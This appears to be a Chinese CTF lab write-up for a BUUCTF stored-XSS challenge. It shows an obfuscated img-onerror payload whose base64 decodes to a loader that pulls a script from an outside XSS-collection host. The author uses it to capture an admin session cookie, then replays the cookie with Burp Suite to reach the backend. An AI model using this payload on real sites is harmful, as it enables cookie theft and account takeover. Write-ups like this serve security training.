【BUUCTF】BUU XSS COURSE 11

进入题目页面如下,有吐槽和登录两个可注入点

根据题目可知是一道XSS

登陆界面没有注册,尝试简单的SQL注入也不行

回到吐槽界面,输入简单的xss代码

<script>alert(1)</script>

访问网址,发现回显不出来,猜测是存储型xss,通过吐槽功能插入xss代码,获取cookie登录后台

可以使用下面这个平台,创建项目

​​​​​​XSS安全平台

复制代码
'"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vdWouY2kvZXplIjtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw== onerror=eval(atob(this.id))>

获取到了 cookie : PHPSESSID=37fe83cc4c3fe53c0686b2029c4cab43

后台路径 http://web/backend/admin.php

根据提示构造url并访问

4276ae11-be9b-4384-bfae-75839de9d1b2.node5.buuoj.cn:81/backend/admin.php

还没改cookie qyq

在burp suite中改cookie值并放行

再次访问,最终得到flag

相关推荐
高林雨露2 分钟前
Java对比学习Kotlin的详细指南(一)
java·学习·kotlin
安建资小栗子18 分钟前
2025年汽车加气站操作工备考题库
笔记
齐尹秦1 小时前
HTML5 Web Workers 学习笔记
笔记·学习
go_to_hacker1 小时前
AI进行全自动渗透
网络·web安全·网络安全·渗透测试·代码审计
DarkBule_1 小时前
零基础驯服GitHub Pages
css·学习·html·github·html5·web
余多多_zZ2 小时前
鸿蒙学习手册(HarmonyOSNext_API16)_应用开发UI设计:Swiper
学习·ui·华为·harmonyos·鸿蒙系统
virelin_Y.lin2 小时前
系统与网络安全------Windows系统安全(4)
windows·web安全·系统安全·账号安全
淬渊阁2 小时前
汇编学习之《扩展指令指针寄存器》
汇编·学习
lalapanda2 小时前
UE5学习记录part12
学习·ue5
不要影响我叠Q2 小时前
《Fundamentals of Electromigration-Aware IntegratedCircuit Design》笔记
笔记